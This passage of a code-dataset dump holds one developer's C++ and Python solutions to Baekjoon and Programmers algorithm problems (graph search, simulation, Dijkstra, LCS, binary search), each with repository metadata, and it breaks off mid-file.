"src_encoding": "UTF-8", "text": "/*\nBOJ 11724번: 연결 요소의 개수\nDATE: 2021-05-25\nDFS, BFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1001\nusing namespace std;\n\nint n, m, cnt=0;\nint arr[MAX][MAX];\nbool visited[MAX];\n\nvoid bfs(int num){\n queue<int> q;\n visited[num] = true;\n q.push(num);\n\n while(!q.empty()){\n int front = q.front();\n q.pop();\n\n for(int i = 1 ; i <= n ; i++){\n if(arr[front][i] && !visited[i]){\n visited[i] = true;\n q.push(i);\n }\n }\n }\n}\n\nvoid dfs(int num){\n visited[num] = true;\n\n for(int i = 1 ; i <= n ; i++){\n if(arr[num][i] && !visited[i]){\n dfs(i);\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < m ; i++){\n int num1, num2;\n cin >> num1 >> num2;\n arr[num1][num2] = arr[num2][num1] = 1;\n }\n\n for(int j = 1 ; j <= n ; j++){\n if(!visited[j]){\n cnt++;\n bfs(j);\n //or\n //dfs(j);\n }\n }\n\n cout << cnt;\n\n return 0;\n}" }, { "alpha_fraction": 0.3388111889362335, "alphanum_fraction": 0.36818182468414307, "avg_line_length": 22.45081901550293, "blob_id": "4beb8cf3f7062a0bd0e92d9da1cc41a920bfcc78", "content_id": "0f88b0085a1b32263e940e9e0cdfb0fdf61a4f42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2870, "license_type": "no_license", "max_line_length": 58, "num_lines": 122, "path": "/BOJ/Implementation/14891.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 14891번: 톱니바퀴\n//2021-07-12\n#include <iostream>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nvector<int> number, direction;\nint arr[4][8];\nint k, ans=0;\n\nvoid turn_gear(int gear, int turn){\n if(turn == 1){ //Clockwise\n int tmp = arr[gear][7];\n\n for(int j = 6 ; j >= 0 ; j--){\n arr[gear][j+1] = arr[gear][j];\n }\n\n arr[gear][0] = tmp;\n }\n else if(turn == -1){ //Counterclockwise\n int tmp = arr[gear][0];\n\n for(int j = 1 ; j < 8 ; j++){\n arr[gear][j-1] = arr[gear][j];\n }\n\n arr[gear][7] = tmp;\n }\n}\n\nvoid solve(){\n for(int i = 0 ; i < number.size() ; i++){\n vector<pair<int,int>> v;\n int gear = number[i] - 1;\n int turn = direction[i], next_turn = -turn;\n\n if(gear == 0){\n for(int j = 1 ; j < 4 ; j++){\n if(arr[j-1][2] == arr[j][6]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n }\n else if(gear == 1){\n if(arr[0][2] != arr[gear][6]){\n turn_gear(0, next_turn);\n }\n for(int j = 2 ; j < 4 ; j++){\n if(arr[j-1][2] == arr[j][6]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n }\n else if(gear == 2){\n if(arr[gear][2] != arr[3][6]){\n turn_gear(3, next_turn);\n }\n for(int j = 1 ; j >= 0 ; j--){\n if(arr[j+1][6] == arr[j][2]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n \n }\n else if(gear == 3){\n for(int j = 2 ; j >= 0 ; j--){\n if(arr[j+1][6] == arr[j][2]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n }\n\n turn_gear(gear, turn);\n\n for(int j = 0 ; j < v.size() ; j++){\n turn_gear(v[j].first, v[j].second);\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n for(int i = 0 ; i < 4 ; i++){\n string str;\n cin >> str;\n for(int j = 0 ; j < 8 ; j++){\n arr[i][j] = str[j] - '0';\n }\n }\n\n cin >> k;\n\n for(int i = 0 ; i < k ; i++){\n int num1, num2;\n cin >> num1 >> num2;\n\n number.push_back(num1);\n direction.push_back(num2);\n }\n\n solve();\n\n for(int i = 0 ; i < 4 ; i++){\n 
if(arr[i][0] == 1) {\n ans += pow(2, i);\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3627311587333679, "alphanum_fraction": 0.4068278670310974, "avg_line_length": 23.258621215820312, "blob_id": "c5077c4d8d357594cec8c6275ec3fc0d6e2260b0", "content_id": "f977c1a7122e93ff8b8e32764ec6906d5618d7a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 93, "num_lines": 58, "path": "/BOJ/Implementation/7682.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 7682번: 틱택토\nDATE: 2022-04-15\n*/\n#include <iostream>\nusing namespace std;\n\nchar arr[3][3];\n\nbool checkWin(string str, char win){\n // 가로 \n for(int i = 0 ; i < 3 ; i++){\n if(arr[i][0] == win && arr[i][0] == arr[i][1] && arr[i][1] == arr[i][2]) return true;\n }\n\n // 세로\n for(int i = 0 ; i < 3 ; i++){\n if(arr[0][i] == win && arr[0][i] == arr[1][i] && arr[1][i] == arr[2][i]) return true;\n }\n\n // 대각선\n if(arr[0][0] == win && arr[0][0] == arr[1][1] && arr[1][1] == arr[2][2]) return true;\n if(arr[0][2] == win && arr[0][2] == arr[1][1] && arr[1][1] == arr[2][0]) return true;\n\n return false;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n\n while(1){\n cin >> str;\n\n if(str == \"end\") break;\n\n int X = 0, O = 0;\n\n for(int i = 0 ; i < 9 ; i++) {\n if(str[i] == 'X') X++;\n else if(str[i] == 'O') O++;\n arr[i / 3][i % 3] = str[i];\n }\n\n if(X == O + 1 && checkWin(str, 'X') && !checkWin(str, 'O')) { // X 승\n cout << \"valid\\n\";\n }\n else if(X == O && checkWin(str, 'O') && !checkWin(str, 'X')){ // O 승\n cout << \"valid\\n\";\n }\n else if(X == 5 && O == 4 && !checkWin(str, 'X') && !checkWin(str, 'O')){ // 비김\n cout << \"valid\\n\";\n }\n else cout << \"invalid\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4985451102256775, "alphanum_fraction": 0.5266731381416321, "avg_line_length": 19.235294342041016, "blob_id": "e89f2686637754079a4be8267a14c42eae2db8a3", "content_id": "a3a7c717188f3f941587a3800752f58cb9837c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 68, "num_lines": 51, "path": "/BOJ/BFS_DFS/1967.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1967번: 트리의 지름\nDATE: 2021-01-21\n*/\n#include <iostream>\n#include <vector>\n#include <string.h>\n#define NODE 10001\n\nusing namespace std;\n\nbool visited[NODE] = { false, };\nint n, next_node, diameter = 0;\nvector<pair <int, int>> tree[NODE];\n\nvoid dfs(int node, int weight) {\n if(weight > diameter){\n diameter = weight;\n next_node = node;\n }\n\n for (int i = 0; i < tree[node].size(); i++) {\n if (!visited[tree[node][i].first]) {\n visited[tree[node][i].first] = true;\n dfs(tree[node][i].first, weight + tree[node][i].second);\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n cin >> n;\n\n for (int i = 1; i <= n - 1; i++) {\n int p, c, w;\n cin >> p >> c >> w;\n tree[p].push_back(make_pair(c, w));\n tree[c].push_back(make_pair(p, w));\n }\n\n visited[1] = true;\n dfs(1, 0);\n\n memset(visited, false, NODE);\n visited[next_node] = true;\n dfs(next_node, 0);\n\n cout << diameter;\n return 0;\n}" }, { "alpha_fraction": 0.40514469146728516, "alphanum_fraction": 0.4662379324436188, "avg_line_length": 15.421052932739258, "blob_id": "855f35368d3d687df59967ef0297e7809f8f2b51", "content_id": 
"f64667a40e14f16c51bbe3898f0a89139adebbd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 319, "license_type": "no_license", "max_line_length": 58, "num_lines": 19, "path": "/BOJ/Implementation/2440.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2440번: 별 찍기 - 3\nDATE: 2022-02-13\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = n ; i > 0 ; i--){\n for(int j = 0 ; j < i ; j++) cout << \"*\";\n cout << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3207964599132538, "alphanum_fraction": 0.3620944023132324, "avg_line_length": 18.955883026123047, "blob_id": "817d3488a99093f5426a0ee42f83ca1d9cf53c51", "content_id": "676ad883c1b56be3839829440dc632e36317bbb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1366, "license_type": "no_license", "max_line_length": 107, "num_lines": 68, "path": "/BOJ/BFS_DFS/10026.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10026번: 적록색약\nDATE: 2021-10-14\nDFS\n*/\n#include <iostream>\n#include <cstring>\nusing namespace std;\n\nchar arr[100][100];\nint visited[100][100] = {0, };\nint n;\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid dfs(int x, int y) {\n visited[x][y] = 1;\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n || visited[nx][ny] || arr[nx][ny] != arr[x][y]) continue;\n dfs(nx, ny);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt = 0, cnt_rg = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(!visited[i][j]){\n dfs(i, j);\n cnt++;\n }\n }\n }\n\n memset(visited, 0, sizeof(visited));\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(arr[i][j] == 'R') arr[i][j] = 'G';\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(!visited[i][j]){\n dfs(i, j);\n cnt_rg++;\n }\n }\n }\n \n cout << cnt << \" \" << cnt_rg << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.3856613039970398, "alphanum_fraction": 0.4128553867340088, "avg_line_length": 18.7560977935791, "blob_id": "b44a9b4c1bc315bbca3305816f611d248fdea088", "content_id": "08153dded87f910ac5aa43933c80601e77a8f0bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 817, "license_type": "no_license", "max_line_length": 62, "num_lines": 41, "path": "/BOJ/Binary Search/2776.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2776번: 암기왕\n2021-12-19\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<int> v;\n int tc, n, m, num;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++) {\n v.clear(); \n cin >> n;\n \n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n v.push_back(num);\n }\n\n sort(v.begin(), v.end());\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> num;\n \n auto upper = upper_bound(v.begin(), v.end(), num);\n auto lower = lower_bound(v.begin(), v.end(), num);\n\n if(upper - lower > 0) cout << 1 << '\\n';\n else cout << 0 << '\\n';\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 
0.4242236018180847, "alphanum_fraction": 0.45279502868652344, "avg_line_length": 22.014286041259766, "blob_id": "25bebdcd28fdfd9f2001b500608d495f25f12bdd", "content_id": "8f5e87415db494dca337a840eb25e12ff0245b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1624, "license_type": "no_license", "max_line_length": 130, "num_lines": 70, "path": "/programmers/Level 1/recommend_new_id.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1 : 신규 아이디 추천\n//2021 KAKAO BLIND RECRUITMENT\n//2021-09-20\n#include <string>\n#include <cctype>\n#include <iostream>\n\nusing namespace std;\n\nstring solution(string new_id) {\n string tmp;\n \n //step 1\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(isupper(new_id[i])) {\n new_id[i] = tolower(new_id[i]);\n }\n }\n \n //step 2\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(islower(new_id[i]) || isdigit(new_id[i]) || new_id[i] == '-' || new_id[i] == '_' || new_id[i] == '.') tmp += new_id[i];\n }\n \n new_id = tmp;\n tmp.clear();\n \n //step 3\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(new_id[i] == '.') {\n if(new_id[i - 1] != '.') tmp += new_id[i];\n }\n else tmp += new_id[i];\n }\n \n new_id = tmp;\n tmp.clear();\n \n //step 4\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(new_id[0] == '.') new_id = new_id.substr(1, new_id.length() - 1);\n if(new_id[new_id.length() - 1] == '.') new_id = new_id.substr(0, new_id.length() - 1);\n }\n \n //step 5\n if(new_id.length() == 0) new_id = 'a';\n \n //step 6\n if(new_id.length() > 15) {\n new_id = new_id.substr(0, 15);\n if(new_id[14] == '.') new_id = new_id.substr(0, 14);\n }\n \n //step 7\n if(new_id.length() < 3){\n char ch = new_id[new_id.length() - 1];\n while(new_id.length() != 3) new_id += ch;\n }\n \n string answer = new_id;\n\n return answer;\n}\n\nint main() {\n string answer = solution(\"...!@BaT#*..y.abcdefghijklm\");\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.5250403881072998, "alphanum_fraction": 0.5420032143592834, "avg_line_length": 24.285715103149414, "blob_id": "816b8773c45b2bc4a84ee56ada33d9f7b86c920d", "content_id": "9bbc96c5185f1a2c47b98c28d835e35f426d5584", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1306, "license_type": "no_license", "max_line_length": 82, "num_lines": 49, "path": "/programmers/Level 1/report_result.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 신고 결과 받기\n2022 KAKAO BLIND RECRUITMENT\nDATE: 2022-04-02\n*/\n#include <string>\n#include <vector>\n#include <map>\n#include <set>\n#include <algorithm>\nusing namespace std;\n\nbool cmp(pair<string, int> p1, pair<string, int> p2) {\n return p1.second < p2.second;\n}\n\nvector<int> solution(vector<string> id_list, vector<string> report, int k) {\n vector<int> answer(id_list.size());\n map<string, int> id, mail; \n map<string, set<string>> all_report; // 신고 당한 유저, 신고한 유저의 집합\n \n for(auto i : report){\n int idx = i.find(' ');\n string a = i.substr(0, idx); // 신고한 ID\n string b = i.substr(idx + 1); // 신고당한 ID\n\n if(all_report[b].find(a) != all_report[b].end()) continue; \n all_report[b].insert(a);\n id[b]++; // b가 신고당한 횟수\n }\n \n for(int i = 0 ; i < id_list.size() ; i++) mail[id_list[i]] = 0;\n \n for(auto i : id){\n string user_id = i.first;\n int cnt = i.second;\n \n if(cnt >= k) {\n for(auto j : all_report[user_id]) mail[j]++;\n }\n }\n \n for(auto i : mail) {\n int idx = 
find(id_list.begin(), id_list.end(), i.first) - id_list.begin();\n answer[idx] = i.second;\n }\n \n return answer; \n}" }, { "alpha_fraction": 0.45571956038475037, "alphanum_fraction": 0.49261993169784546, "avg_line_length": 18.39285659790039, "blob_id": "352152e7a6934dc139fe2ae5d8ba777551e0e096", "content_id": "3aab69c5aaabdac36db8ff760289fa91e3a8820a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 556, "license_type": "no_license", "max_line_length": 83, "num_lines": 28, "path": "/BOJ/Implementation/11651.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11651번: 좌표 정렬하기 2\nDATE: 2021-04-29\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\npriority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n int x, y;\n cin >> x >> y;\n pq.push(make_pair(y, x));\n }\n\n for(int i = 0 ; i < n ; i++){\n cout << pq.top().second << \" \" << pq.top().first << '\\n';\n pq.pop();\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3916161060333252, "alphanum_fraction": 0.4175399839878082, "avg_line_length": 21.395061492919922, "blob_id": "f199aed395fb7076a30ea476c2679bf620a9dcdc", "content_id": "04d097e6e6fd78351c75a44283b45974beeb5886", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2055, "license_type": "no_license", "max_line_length": 99, "num_lines": 81, "path": "/BOJ/BFS_DFS/16236.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16236번: 아기 상어\nDATE: 2021-04-11\nBFS\n*/\n#include <iostream>\n#include <queue>\n#include <tuple>\n#include <cstring>\n#include <algorithm>\n#define MAX 20\nusing namespace std;\n\nint arr[MAX][MAX];\nint n; \nint shark=2, eat, mv; //상어의 크기, 상어가 먹은 물고기 수, 상어가 움직인 횟수\nbool visited[MAX][MAX];\nint dx[4] = {0, 1, 0, -1};\nint dy[4] = {1, 0, -1, 0};\n\npriority_queue<tuple<int, int, int>> pq;\n//최소힙의 우선순위는 이동거리 - x좌표 - y좌표\n//문제의 우선순위가 거리가 가까운 것 - 가장 위쪽 - 가장 왼쪽이기 때문에\n\nvoid bfs(){\n tuple<int, int, int> t;\n\n while(!pq.empty()){\n t = pq.top();\n int d = -get<0>(t);\n int x = -get<1>(t);\n int y = -get<2>(t);\n pq.pop();\n\n if(0 < arr[x][y] && arr[x][y] < shark){ //해당 위치의 물고기를 먹을 수 있는 경우\n eat++;\n arr[x][y] = 0;\n if(shark == eat){ //상어의 크기 수만큼 물고기를 먹었을 때\n eat = 0;\n shark++;\n }\n\n mv += d;\n d = 0;\n memset(visited, false, sizeof(visited));\n while(!pq.empty()) pq.pop();\n }\n\n for(int i = 0 ; i < 4 ; i++){\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx >= 0 && ny >= 0 && nx < n && ny < n && arr[nx][ny] <= shark && !visited[nx][ny]){\n visited[nx][ny] = true;\n pq.push(make_tuple(-(d+1), -nx, -ny));\n }\n }\n\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n;\n \n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n cin >> arr[i][j];\n if(arr[i][j] == 9){\n pq.push(make_tuple(0, -i, -j)); //우선순위 큐를 min heap으로 바꾸기 위해 음수 처리\n arr[i][j] = 0;\n visited[i][j] = true;\n }\n }\n }\n\n bfs();\n cout << mv;\n \n return 0;\n}" }, { "alpha_fraction": 0.36638572812080383, "alphanum_fraction": 0.3886960744857788, "avg_line_length": 22.74117660522461, "blob_id": "c27b1ac93afedca9c5142a06047957f19d770c50", "content_id": "e9f36360bc0384a231dde70360b8836d47a4be4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2077, "license_type": 
"no_license", "max_line_length": 97, "num_lines": 85, "path": "/BOJ/BFS_DFS/16234.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16234번: 인구 이동\nDATE: 2021-11-10\nDFS\n*/\n#include <iostream>\n#include <queue>\n#include <string.h>\n#define MAX 50\nusing namespace std;\nint n, l, r, sum = 0;\nint arr[MAX][MAX];\nbool visited[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nvector<pair<int,int>> v;\n\nvoid dfs(int x, int y) {\n v.push_back(make_pair(x, y));\n visited[x][y] = true;\n sum += arr[x][y];\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n || visited[nx][ny]) continue;\n if(abs(arr[nx][ny] - arr[x][y]) < l || abs(arr[nx][ny] - arr[x][y]) > r) continue;\n dfs(nx, ny);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int ans = 0;\n cin >> n >> l >> r;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[i][j];\n }\n }\n\n while(1) {\n memset(visited, false, sizeof(visited));\n vector<pair<pair<int,int>, int>> record;\n int cnt = 0;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(!visited[i][j]) {\n v.clear(); sum = 0;\n dfs(i, j);\n\n if(v.size() == 1) {\n visited[i][j] = false;\n cnt++;\n continue;\n }\n\n int num = sum / v.size();\n for(int i = 0 ; i < v.size() ; i++) {\n record.push_back({{v[i].first, v[i].second}, num}); // (값을 변경할 위치, 변경할 값)\n }\n }\n }\n }\n\n if(cnt == n * n) break; // 더 이상 인구 이동이 불가능한 경우\n\n for(int i = 0 ; i < record.size() ; i++) {\n int x = record[i].first.first;\n int y = record[i].first.second;\n int num = record[i].second;\n\n arr[x][y] = num;\n }\n\n ans++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4248366057872772, "alphanum_fraction": 0.4901960790157318, "avg_line_length": 13.619047164916992, "blob_id": "23cae1492d24f19281d7e9027ffe60c00bef8f73", "content_id": "0f8ecac9a1cc8c4fc29fab054e1d48eda2bf7990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 314, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/BOJ/Bitmask/1094.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1094번: 막대기\nDATE: 2022-01-25\nBitmask\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < 7 ; i++) {\n if(n & (1 << i)) ans++;\n }\n\n cout << ans;\n \n return 0;\n}" }, { "alpha_fraction": 0.342803031206131, "alphanum_fraction": 0.3797348439693451, "avg_line_length": 17.224138259887695, "blob_id": "85f950df0e2ecd1943cadad08c857019a093499c", "content_id": "2ffe02171c1f780b48e87b9884ae33766406f948", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 58, "num_lines": 58, "path": "/BOJ/Implementation/2866.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2866번: 문자열 잘라내기\nDATE: 2021-11-16\n*/\n#include <iostream>\n#include <set>\nusing namespace std;\n\nchar arr[1000][1000];\nint r, c;\n\nbool check_overlap() { // 마지막 줄만 검사\n int alpha[26] = {0, };\n bool flag = true;\n\n for(int i = 0 ; i < c ; i++) {\n if(++alpha[arr[r-1][i] - 97] > 1) {\n flag = false;\n break;\n }\n }\n\n return flag;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt = 0;\n cin >> 
r >> c;\n\n for(int i = 0 ; i < r ; i++) {\n for(int j = 0 ; j < c ; j++) {\n cin >> arr[i][j];\n }\n }\n\n if(check_overlap()) cout << r - 1; // 문자열 중복 X\n else { // 문자열 중복 O\n string str[c];\n set<string> s;\n\n for(int i = r - 1 ; i >= 0 ; i--) {\n for(int j = 0 ; j < c ; j++) {\n str[j] += arr[i][j];\n s.insert(str[j]);\n }\n\n if(s.size() == c) {\n cout << i;\n break;\n }\n\n s.clear();\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.39054054021835327, "alphanum_fraction": 0.4445945918560028, "avg_line_length": 24.55172348022461, "blob_id": "09bdcc14fd66bfd15bf6e9867104718f15dc3956", "content_id": "e0d677d2e9a52749aaeeef84819680f69f2fd5b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 742, "license_type": "no_license", "max_line_length": 107, "num_lines": 29, "path": "/BOJ/Dynamic Programming/1958.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1958번: LCS 3\nDATE: 2022-02-17\nDynamic Programming (Longest Common Subsequence)\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint dp[101][101][101];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string a, b, c;\n cin >> a >> b >> c;\n\n for(int i = 1 ; i <= a.length() ; i++){\n for(int j = 1 ; j <= b.length() ; j++){\n for(int k = 1 ; k <= c.length() ; k++){\n if(a[i - 1] == b[j - 1] && b[j - 1] == c[k - 1]) dp[i][j][k] = dp[i - 1][j - 1][k - 1] + 1;\n else dp[i][j][k] = max({dp[i - 1][j][k], dp[i][j - 1][k], dp[i][j][k - 1]});\n }\n }\n }\n \n cout << dp[a.length()][b.length()][c.length()];\n\n return 0;\n}" }, { "alpha_fraction": 0.47398844361305237, "alphanum_fraction": 0.49793559312820435, "avg_line_length": 19.542373657226562, "blob_id": "e3dc59bb3d7fcd421cfe7ea4dafc1d64ee212093", "content_id": "95e71d7898bd6837566eaea6dab0767608d3d9d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1221, "license_type": "no_license", "max_line_length": 84, "num_lines": 59, "path": "/BOJ/Dijkstra/5972.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5972번: 택배 배송\n2021-12-29\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 50001\n#define INF 1e9\nusing namespace std;\n\nint d[MAX];\nvector<pair<int, int>> graph[MAX];\n\nvoid dijkstra(int start) {\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> pq;\n \n pq.push({0, start});\n d[start] = 0;\n\n while(!pq.empty()) {\n int distance = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(distance > d[cur]) continue; \n for(int i = 0 ; i < graph[cur].size() ; i++) {\n int newDistance = graph[cur][i].second;\n int next = graph[cur][i].first;\n\n if(newDistance + distance < d[next]) {\n d[next] = newDistance + distance;\n pq.push({d[next], next});\n }\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int a, b, c;\n\n cin >> n >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b >> c;\n graph[a].push_back({b, c});\n graph[b].push_back({a, c});\n }\n\n fill(d, d + n + 1, INF);\n\n dijkstra(1);\n cout << d[n];\n \n return 0;\n}" }, { "alpha_fraction": 0.47730061411857605, "alphanum_fraction": 0.5030674934387207, "avg_line_length": 17.545454025268555, "blob_id": "3cd1692539828ab077dcebeccb8e8cd329f58b0d", "content_id": "0a5f3e4d9478af326abae0e0c8e9ac96dcb462ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 819, "license_type": "no_license", "max_line_length": 35, "num_lines": 44, "path": "/BOJ/BFS_DFS/1260.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1260.py\n# BOJ 1260번: DFS와 BFS\n# DATE: 2022-03-15\nimport sys\nfrom collections import deque\nread = sys.stdin.readline\n\ndef dfs(v):\n print(v, end=' ')\n visited[v] = True\n \n for i in graph[v]:\n if not visited[i]:\n dfs(i)\n\ndef bfs(n):\n visited[n] = True;\n queue = deque([n])\n \n while queue:\n v = queue.popleft()\n print(v, end=' ')\n \n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n \nn, m, v = map(int, read().split())\ngraph = [[] for _ in range(n+1)]\nvisited = [False] * (n+1)\n\nfor _ in range(m):\n a, b = map(int, read().split())\n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(1, n+1):\n graph[i].sort()\n \ndfs(v)\nvisited = [False] * (n+1)\nprint()\nbfs(v)" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.4680851101875305, "avg_line_length": 14.325581550598145, "blob_id": "e70c5b6e009c456c71e388bb9301f7a404daec0e", "content_id": "b6bf56915fb1640b23da7755cba2a4dcc6595b26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 672, "license_type": "no_license", "max_line_length": 58, "num_lines": 43, "path": "/BOJ/BFS_DFS/1182.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1182번: 부분수열의 합\nDATE: 2022-02-04\nBacktracking\n*/\n#include <iostream>\nusing namespace std;\n\nint n, s, ans;\nint arr[21];\nbool visited[21];\n\nvoid dfs(int num) {\n int sum = 0;\n\n for(int i = 1 ; i <= n ; i++) {\n if(visited[i]) sum += arr[i];\n }\n\n if(sum == s) ans++;\n\n for(int i = num ; i <= n ; i++) {\n if(visited[i]) continue;\n\n visited[i] = true;\n dfs(i + 1);\n visited[i] = false;\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> s;\n\n for(int i = 1 ; i <= n ; 